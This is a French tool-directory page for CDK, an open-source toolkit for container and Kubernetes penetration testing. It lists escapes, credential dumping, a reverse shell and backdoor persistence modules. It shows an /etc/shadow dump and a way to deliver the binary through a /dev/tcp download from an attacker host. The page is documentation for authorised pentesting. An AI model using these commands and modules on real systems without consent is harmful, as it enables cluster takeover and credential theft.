Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CDK — 📦 Facilitez les tests de sécurité de K8s, Docker et Containerd. | Kitploit
Outils/GitHubGitHub/cdk-team/cdk
Escalade de PrivilègesReconnaissanceSécurité des ConteneursMécanismes de PersistanceExploitationMouvement LatéralPost-ExploitationTests d'IntrusionSécurité CloudÉvasion de Conteneur
GitHubcdk-team/cdk

CDK

4.7k606il y a 3 moisVérifié par Kitploit

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

📦 Facilitez les tests de sécurité de K8s, Docker et Containerd.

Voir le dépôtSite web

CDK - Kit de pénétration de conteneurs sans dépendance

Anglais | 简体中文

png

Avis de non-responsabilité légal

L'utilisation de CDK pour attaquer des cibles sans consentement mutuel préalable est illégale. CDK est destiné uniquement à des fins de tests de sécurité.

Aperçu

CDK est un toolkit de pénétration de conteneurs open-source, conçu pour offrir une exploitation stable dans différents conteneurs allégés sans aucune dépendance au système d'exploitation. Il est fourni avec des outils réseau utiles et de nombreux PoCs/EXPs puissants et vous aide à vous échapper du conteneur et à prendre le contrôle du cluster K8s facilement.

Démarrage rapide

Exécutez cdk eva pour obtenir des informations d'évaluation et une exploit recommandée, puis exécutez cdk run pour lancer l'attaque.

root@kitploit:~
> ./cdk eva --full

[*] Maybe you can exploit the *Capabilities* below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
[!] CAP_SYS_MODULE enabled. You can escape the container via loading kernel module. More info at https://xcellerator.github.io/posts/docker_escape/.
Critical - SYS_ADMIN Capability Found. Try 'cdk run rewrite-cgroup-devices/mount-cgroup/...'.
Critical - Possible Privileged Container Found.

> ./cdk run cap-dac-read-search

Running with target: /etc/shadow, ref: /etc/hostname
ubuntu:$6$*******:19173:0:99999:7:::
root:*:18659:0:99999:7:::
daemon:*:18659:0:99999:7:::
bin:*:18659:0:99999:7:::

Installation/Livraison

Téléchargez la dernière version sur https://github.com/cdk-team/CDK/releases/

Déposez les fichiers exécutables dans le conteneur cible et commencez les tests.

ASTUCES : Livrer CDK dans le conteneur cible lors de tests de pénétration réels

Si vous avez une exploit qui peut téléverser un fichier, vous pouvez alors téléverser le binaire CDK directement.

Si vous avez une RCE exploit, mais que le conteneur cible n'a ni curl ni wget, vous pouvez utiliser la méthode suivante pour livrer CDK :

  1. D'abord, hébergez le binaire CDK sur votre hôte avec une IP publique.
root@kitploit:~
(sur votre hôte)
nc -lvp 999 < cdk
  1. Dans le conteneur victime, exécutez
root@kitploit:~
cat < /dev/tcp/(votre_ip_hote_publique)/(port) > cdk
chmod a+x cdk

Utilisation

root@kitploit:~
Usage:
  cdk evaluate [--full]
  cdk run (--list | <exploit> [<args>...])
  cdk <tool> [<args>...]

Evaluate:
  cdk evaluate                              Collecte des informations pour trouver des failles dans le conteneur.
  cdk evaluate --full                       Active l'analyse des fichiers lors de la collecte d'informations.

Exploit:
  cdk run --list                            Liste toutes les exploits disponibles.
  cdk run <exploit> [<args>...]             Exécute une exploit unique, documentation sur https://github.com/cdk-team/CDK/wiki

Tool:
  vi <file>                                 Modifie les fichiers dans le conteneur comme la commande "vi".
  ps                                        Affiche les informations sur les processus comme la commande "ps -ef".
  nc [options]                              Crée un tunnel TCP.
  ifconfig                                  Affiche les informations réseau.
  kcurl <path> (get|post) <uri> <data>      Effectue une requête au K8s api-server.
  ectl <endpoint> get <key>                 Énumération non autorisée des clés etcd.
  ucurl (get|post) <socket> <uri> <data>    Effectue une requête au socket Unix docker.
  probe <ip> <port> <parallel> <timeout-ms> Scan de port TCP, exemple : cdk probe 10.0.1.0-255 80,8080-9443 50 1000

Options:
  -h --help     Affiche ce message d'aide.
  -v --version  Affiche la version.
  --profile=<name> Sélectionne le profil d'évaluation.

Fonctionnalités

CDK dispose de trois modules :

  1. Évaluation : collecte des informations à l'intérieur du conteneur pour trouver des faiblesses potentielles.
  2. Exploit : pour l'évasion de conteneur, la persistance et le mouvement latéral.
  3. Outil : outils réseau et API pour les requêtes TCP/HTTP, les tunnels et la gestion de cluster K8s.

Module d'évaluation

Utilisation

root@kitploit:~
cdk evaluate [--full]

Module d'exploit

Liste toutes les exploits disponibles :

root@kitploit:~
cdk run --list

Exécute une exploit ciblée :

root@kitploit:~
cdk run <nom-script> [options]

Note sur Thin : La version thin est préparée pour les shells de conteneurs à courte durée de vie, comme les fonctions serverless. Nous ajoutons des tags de build dans le code source et supprimons quelques exploits pour alléger le binaire. Le fichier de 2 Mo contient 90% des fonctions de CDK, vous pouvez également sélectionner des exploits utiles dans le code source de CDK pour construire votre propre binaire léger.

Module d'outils

Exécution de commandes comme sous Linux, légèrement différente dans les arguments d'entrée, voir le lien d'utilisation.

root@kitploit:~
cdk nc [options]
cdk ps

Document de version

Si vous voulez savoir comment nous avons publié une nouvelle version, comment la version thin est produite, pourquoi nous fournissons des versions upx, quelles sont les différences entre les versions all, normal, thin, upx, et comment sélectionner des exploits et outils CDK spécifiques pour compiler votre propre version, veuillez consulter le Document de version.

Documentation développeur

  • Exécuter un test dans le conteneur.

Contribuer à CDK

Tout d'abord, merci de prendre le temps de contribuer !

Merci aux contributeurs suivants :

Plus de contributeurs : Liste des contributeurs

Signalement de bugs

Les bugs sont suivis via GitHub Issues. Créez une issue avec la version actuelle de CDK, le message d'erreur et l'environnement. Décrivez les étapes exactes qui reproduisent le problème.

Suggestion d'améliorations

Les suggestions d'améliorations sont suivies via GitHub Discussions. Vous pouvez publier vos réflexions ici pour discuter directement avec les développeurs.

Pull Requests

Correction de problèmes ou maintien de la qualité de CDK :

  • Décrivez la version actuelle de CDK, l'environnement, le problème et les étapes exactes qui reproduisent le problème.
  • Captures d'écran ou logs avant et après la correction du problème.

Nouvelle fonctionnalité ou exploits :

  • Expliquez pourquoi cette amélioration serait utile aux autres utilisateurs.
  • Veuillez fournir un environnement durable pour que nous puissions examiner les contributions.
  • Captures d'écran sur le fonctionnement de cette nouvelle fonctionnalité.
  • Si vous soumettez de nouveaux scripts d'évaluation/exploit, veuillez ajouter une documentation simple dans votre message PR, voici un exemple.

Événements

404StarLink 2.0 - Galaxy

png

Le projet CDK fait maintenant partie du Projet Starlink 2.0 de l'équipe 404. Rejoignez la communauté StarLink pour entrer en contact avec l'équipe de développement de CDK.

  • https://github.com/knownsec/404StarLink2.0-Galaxy#community

BlackHat Asia 2021 Arsenal

  • https://www.blackhat.com/asia-21/arsenal/schedule/index.html#cdk-zero-dependency-container-penetration-toolkit-22422

HITB SecConf 2021 Amsterdam

  • Briefing: "Attack Cloud Native Kubernetes"

WHC 2021 (补天白帽大会)

  • CDK: Also a Awesome BugBounty Tool for Cloud Platform

KCON 2021 Arsenal

  • http://kcon.knownsec.com/2021/#/arsenal

Kubernetes community Days 2021

  • https://community.cncf.io/events/details/cncf-kcd-china-presents-kubernetes-community-days-china/
Télécharger l’outil
TactiquesScriptSupportéUtilisation/Exemple
Collecte d'informationsInfos de base OS✔lien
Collecte d'informationsCapacités disponibles✔lien
Collecte d'informationsCommandes Linux disponibles✔lien
Collecte d'informationsPoints de montage✔lien
Collecte d'informationsEspace de noms réseau✔lien
Collecte d'informationsENV sensibles✔lien
Collecte d'informationsProcessus sensibles✔lien
Collecte d'informationsFichiers locaux sensibles✔lien
Collecte d'informationsKube-proxy Route Localnet(CVE-2020-8558)✔lien
Collecte d'informationsDécouverte de services basée sur DNS✔lien
DécouverteInfos K8s Api-server✔lien
DécouverteInfos K8s Service-account✔lien
DécouverteAPI Metadata du fournisseur Cloud✔lien
TactiqueTechniqueNom de l'exploit CDKSupportéDans ThinDoc
Évasiondocker-runc CVE-2019-5736runc-pwn✔✔
Évasioncontainerd-shim CVE-2020-15257shim-pwn✔lien
Évasiondocker.sock PoC (attaque DIND)docker-sock-check✔✔lien
Évasiondocker.sock RCEdocker-sock-pwn✔✔lien
ÉvasionDocker API(2375) RCEdocker-api-pwn✔✔lien
ÉvasionÉvasion par montage de périphériquemount-disk✔✔lien
ÉvasionÉvasion LXCFSlxcfs-rw✔✔lien
ÉvasionÉvasion Cgroupsmount-cgroup✔✔lien
ÉvasionAbus de l'espace utilisateur non privilégié Évasion CVE-2022-0492abuse-unpriv-userns✔✔lien
ÉvasionÉvasion Procfsmount-procfs✔✔lien
ÉvasionÉvasion Ptrace PoCcheck-ptrace✔✔lien
ÉvasionRéécriture Cgroup(devices.allow)rewrite-cgroup-devices✔✔lien
ÉvasionLecture de fichiers arbitraires du système hôte (CAP_DAC_READ_SEARCH)cap-dac-read-search✔✔lien
DécouverteSondage des composants K8sservice-probe✔✔lien
DécouverteRécupération des métadonnées Istio Sidecaristio-check✔✔lien
DécouverteRécupération des politiques de sécurité des pods K8sk8s-psp-dump✔lien
Contrôle à distanceReverse Shellreverse-shell✔✔lien
Contrôle à distanceKubelet Execkubelet-exec✔✔
Accès aux identifiantsBruteForce de registreregistry-brute✔✔lien
Accès aux identifiantsAnalyse de clés d'accèsak-leakage✔✔lien
Accès aux identifiantsEtcd Obtenir le jeton K8setcd-get-k8s-token✔✔
Accès aux identifiantsRécupération des secrets K8sk8s-secret-dump✔✔lien
Accès aux identifiantsRécupération de la configuration K8sk8s-configmap-dump✔✔lien
Élévation de privilègesContournement RBAC K8sk8s-get-sa-token✔✔lien
Élévation de privilègesCVE-2026-31431 copy-fail (non-root→root & x86_64 uniquement)copy-fail-cve-2026-31431✔lien
PersistanceDéploiement WebShellwebshell-deploy✔✔lien
PersistanceDéploiement d'un pod porte dérobéek8s-backdoor-daemonset✔✔lien
PersistanceDéploiement d'un K8s api-server fantômek8s-shadow-apiserver✔lien
PersistanceAttaque K8s MITM (CVE-2020-8554)k8s-mitm-clusterip✔✔lien
PersistanceDéploiement K8s CronJobk8s-cronjob✔✔lien
CommandeDescriptionSupportéUtilisation/Exemple
ncTunnel TCP✔lien
psInformations sur les processus✔lien
netstatComme la commande "netstat -antup"✔
ifconfigInformations réseau✔lien
viModifier des fichiers✔lien
ectlÉnumération non autorisée des clés etcd✔
kcurlRequête au K8s api-server✔lien
dcurlRequête à l'API HTTP Docker✔lien
ucurlRequête au socket Unix Docker✔lien
rcurlRequête à l'API du registre Docker
probeScan IP/Port✔lien